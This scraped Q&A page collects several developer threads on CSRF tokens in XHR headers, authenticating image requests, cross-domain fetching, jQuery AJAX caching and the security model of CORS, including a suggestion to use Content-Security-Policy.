CSRF-Prevention for XHR-Requests - javascript

I did just learn about the details of CSRF-prevention. In our application, all "writing" requests are done using XHR. Not a single form is actually submitted in the whole page, everything is done via XHR.
For this scenario, Wikipedia suggests Cookie-to-Header Token. There, some random value is stored in a cookie during login (or at some other point in time). When making an XHR-request, this value is then copied to a custom http-header (e.g. "X-csrf-token="), which is then checked by the server.
Now I am wondering, if the random value is actually necessary at all in this scenario. I think it should be enough to just set a custom header like "X-anti-csrf=true". Seems a lot more stable than dragging a random value around. But does this open any security issues?

It depends on how many risky assumptions you want to make.
you have properly configured your CORS headers,
and the user's browser respects them,
so there is no way a malicious site can send an XHR to your domain,
which is the only way to send custom headers with a request
If you believe in all that, sure, a fixed custom header will work.
If you remove any of the assumptions, then your method fails.
If you make the header impossible to guess, then you don't need to make those assumptions. You're still relying on the assumption that the value of that header can't be intercepted and duplicated by a third party (there's TLS for that).

Related

Should Ajax actions REALLY have separate URL?

Every now and then I hear an opinion that having the same URL for non-Ajax and Ajax action is bad.
On my app, I'm having forms that are sent with Ajax for better user experience. For people who disable JavaScript, my forms work too. Same goes with some of my links. I used to have the same URL for both and just use appropriate content and Content-Type, according to whether it's an Ajax call or not. This caused problem with Google Chrome: Laravel 5 and weird bug: curly braces on back
My question now is - is this REALLY bad idea to have the same URL for Ajax and non-Ajax actions? It's painful to make two separate URLs for each of those actions. Or maybe is there a good workaround to manage caching? In theory, one header can change the behavior entirely, so I don't see why should I create extra layer of my app and force the same thing to have separate URL.
Please share your opinions.
HTTP is flexible and allows you to design the resources the way you want. You design the APIs and designing comes to personal preferences. But in this case, having one resource that responds to different types of request is absolutely fine. This is why the HTTP headers like Content-type exists.
And for the caching you can use HTTP Etag header. It's a caching header that forces the client to validate the cached resources before using them.
The ETag or entity tag is part of HTTP, the protocol for the World Wide Web. It is one of several mechanisms that HTTP provides for web cache validation, which allows a client to make conditional requests. This allows caches to be more efficient, and saves bandwidth, as a web server does not need to send a full response if the content has not changed

Setting request header, in a URL?

We have a webservice that is mainly intended to be called from javascript, via jquery's $.ajax(). When we call methods from javascript, we set a security token in a request header. If it's not there, or if it doesn't validate, we return an unauthorized error.
And that's all working fine.
But now we're faced with returning image files. So instead of having javascript call $.ajax(), we're embedding an image tag in the DOM:
<img src='http://mywebservice/imagescontroller/getAnImage?imageid=123'/>
And when we do that, we don't have our security token in the request header. I can think of two "easy" fixes. 1., we simply allow anonymous access to our image URLs, or 2., we pass the security token as a URL parameter.
The first choice is, of course, not a good idea. The second is straightforward enough. But before I settle on this approach, I was wondering if there was some easy way of setting request headers on these sorts of requests, that I was missing.
Ideas?
Easy fix: Use session cookies. That is a cookie without a expiry date. It will automatically transmit with each request and go away as soon as the users closes the browser, or you delete the cookie via javascript.
You simply store your token there and get it delivered for free to your server code.
Have some demo stuff here:
How do I set/unset cookie with jQuery?
If you run the services on another domain, you will need to use CORS to make the AJAX running - otherwise your AJAX will run into the Same Origin Policy. With CORS you can even make the cookies work.
See here: CORS request - why are the cookies not sent?
If you do not want to use CORS, you could also incorporate the service domain into your own via reverse proxying. This will solve the SOP problem as well as make the use of cookies possible. Setting up a reverse proxy within Apache is pretty straight forward.

Using a client's IP to get content

I'm a bit embarrassed here because I am trying to get content remotely, by using the client's browser and not the server. But I have specifications which make it look impossible to me, I literally spent all day on it with no success.
The data I need to fetch is on a distant server.
I don't own this server (I can't do any modification to it).
It's a string, and I need to get it and pass it to PHP.
It must be the client's (user browsing the website) browser that actually gets the data (it needs to be it's IP, and not the servers).
And, with the cross-domain policy I don't seem to be able to get around it. I already knew about it, still tried a simple Ajax query, which failed. Then I though 'why not use iFrames', but the same limitation seems to apply to them too. I then read about using YQL (http://developer.yahoo.com/yql/) but I noticed the server I was trying to reach blocked YQL's user-agent making it impossible to use this technique.
So, that's all I could think about or find. But I can't believe it's not possible to achieve such a thing, that doesn't even look hard...
Oh, and my Javascript knowledge is very basic, this mustn't help either.
This is one reason that the same-origin policy exists. You're trying to have your webpage access data on a different server, without the user knowing, and without having "permission" from the other server to do so.
Without establishing a two-way trust system (ie modifying the 'other' server), I believe this is not possible.
Even with new xhr and crossdomain support, two-way trust is still required for the communication to work.
You could consider a fat-client approach, or try #selbie suggestion and require manual user interaction.
The same origin policy prevents document or script loaded from one
origin from getting or setting properties of a document from a different
origin.
-- From http://www.mozilla.org/projects/security/components/same-origin.html
Now if you wish to do some hackery to get it... visit this site
Note: I have never tried any of the methods on the aforementioned site and cannot guarantee their success
I can only see a really ugly solution: iFrames. This article contains some good informations to start with.
You could do it with flash application:
flash with a crossdomain.xml file (won't help though since you don't control the other server)
On new browsers there is CORS - requires Access-Control-Allow-Origin header set on the server side.
You can also try to use JSONP (but I think that won't work since you don't own the other server).
I think you need to bite the bullet and find some other way to get the content (on the server side for example).

Why cache AJAX with jQuery?

I use jQuery for AJAX. My question is simple - why cache AJAX? At work and in every tutorial I read, they always say to set caching to false. What happens if you don't, will the server "store" such requests and get "clogged up"? I can find no good answer anywhere - just links telling you how to set caching to false!
It's not that the server stores requests (though they may do some caching, especially higher volume sites, like SO does for anonymous users).
The issue is that the browser will store the response it gets if instructed to (or in IE's case, even when it's not instructed to). Basically you set cache: false if you don't want to user's browser to show stale data it fetched X minutes ago for example.
If it helps, look at what cache: false does, it appends _=190237921749817243 as a query string pair (random number, the actual one is the current time, so it's always....current). This forces the browser to make the request to the server for data again, since it doesn't know what that query string means, it may be a different page...and since it can't know or be sure, it has to fetch again.
The server won't cache the requests, the browser will. Remember that browsers are built to display pages quickly, so they have a cache that maps URLs to the results last returned by those URLs. Ajax requests are URLs returning results, so they could also be cached.
But usually, Ajax requests are meant to do something, you don't want to skip them ever, even if they look like the same URL as a previous request.
If the browser cached Ajax requests, you'd have stale responses, and server actions being skipped.
If you don't turn it off you'll have issues trying to figure why you AJAX works but your functions aren't responding as you'd like them to. Forced re-validation at the header level is probably the best way to gain a cache-less assimilation of the data being AJAX'd in.
Here's a hypothetical scenario. Say you want the user to be able to click any word on your page and see a tooltip with the definition for that word. The definition is not going to change, so it's fine to cache it.
The main problem with caching requests in any kind of dynamic environment is that you'll get stale data back some of the time. And it can be unpredictable when you'll get a 'fresh' pull vs. a cached pull.
If you're pulling static content via AJAX, you could maybe leave caching on, but how sure are you that you'll never want to change that fetched content?
The problem is, as always, Internet Explorer. IE will usually cache the whole request. So, if you are repeatedly firing the same AJAX request then IE will only do it once and always show the first result (even though subsequent requests could return different results).
The browser caches the information, not the server. The point in using Ajax is usually because you're going to be getting information that changes. If there's a part of a website or something you know isn't going to change, you don't bother with it more than once (in which case, caching is ok), that's the beauty of Ajax. Since you should only be dealing with information that may be changing, you want to get the new information. Therefore, you don't want the browser to cache.
For example, Gmail uses Ajax. If caching was simply left on you wouldn't see your new e-mail for quite awhile, which would be bad.

Cross-Origin Resource Sharing (CORS) - am I missing something here?

I was reading about CORS and I think the implementation is both simple and effective.
However, unless I'm missing something, I think there's a big part missing from the spec. As I understand, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.
I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.
So the expanded sequence would be:
Supply a page with list of acceptable CORS servers (abc.com, xyz.com, etc)
Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list and authentication proceeds as normal
Page wants to make an XHR request to malicious.com - request rejected locally (ie by the browser) because the server is not in the list.
I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.
I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?
What about it? You can already do that without CORS. Even back as far as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests caused by interfaces as simple as form.submit(), new Image or setting window.location.
If malicious code has access to sensitive information, you have already totally lost.
3) Page wants to make an XHR request to malicious.com - request rejected locally
Why would a page try to make an XHR request to a site it has not already whitelisted?
If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.
Your worries are completely valid.
However, more worrisome is the fact that there doesn't need to be any malicious code present for this to be taken advantage of. There are a number of DOM-based cross-site scripting vulnerabilities that allow attackers to take advantage of the issue you described and insert malicious JavaScript into vulnerable webpages. The issue is more than just where data can be sent, but where data can be received from.
I talk about this in more detail here:
http://isisblogs.poly.edu/2011/06/22/cross-origin-resource-inclusion/
http://files.meetup.com/2461862/Cross-Origin%20Resource%20Inclusion%20-%20Revision%203.pdf
It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making a stricter cross domain policy on other tags (script/image) while being more secure, would break a lot of existing code, and make it much more difficult to adopt the new technology. Hopefully, something will be done to close that security hole, but I think they need to make sure its an easy transition first.
I also checked out the official CORS spec and could not find any mention of this issue.
Right. The CORS specification is solving a completely different problem. You're mistaken that it makes the problem worse - it makes the problem neither better nor worse, because once a malicious script is running on your page it can already send the data anywhere.
The good news, though, is that there is a widely-implemented specification that addresses this problem: the Content-Security-Policy. It allows you to instruct the browser to place limits on what your page can do.
For example, you can tell the browser not to execute any inline scripts, which will immediately defeat many XSS attacks. Or—as you've requested here—you can explicitly tell the browser which domains the page is allowed to contact.
The problem isn't that a site can access another sites resources that it already had access to. The problem is one of domain -- If I'm using a browser at my company, and an ajax script maliciously decides to try out 10.0.0.1 (potentially my gateway), it may have access simply because the request is now coming from my computer (perhaps 10.0.0.2).
So the solution -- CORS. I'm not saying its the best, but is solves this issue.
1) If the gateway can't return back the 'bobthehacker.com' accepted origin header, the request is rejected by the browser. This handles old or unprepared servers.
2) If the gateway only allows items from the myinternaldomain.com domain, it will reject an ORIGIN of 'bobthehacker.com'. In the SIMPLE CORS case, it will actually still return the results. By default; you can configure the server to not even do that. Then the results are discarded without being loaded by the browser.
3) Finally, even if it would accept certain domains, you have some control over the headers that are accepted and rejected to make the request from those sites conform to a certain shape.
Note -- the ORIGIN and OPTIONS headers are controlled by the requester -- obviously someone creating their own HTTP request can put whatever they want in there. However a modern CORS compliant browser WONT do that. It is the Browser that controls the interaction. The browser is preventing bobthehacker.com from accessing the gateway. That is the part you are missing.
I share David's concerns.
Security must be built layer by layer and a white list served by the origin server seems to be a good approach.
Plus, this white list can be used to close existing loopholes (forms, script tag, etc...), it's safe to assume that a server serving the white list is designed to avoid back compatibility issues.

Categories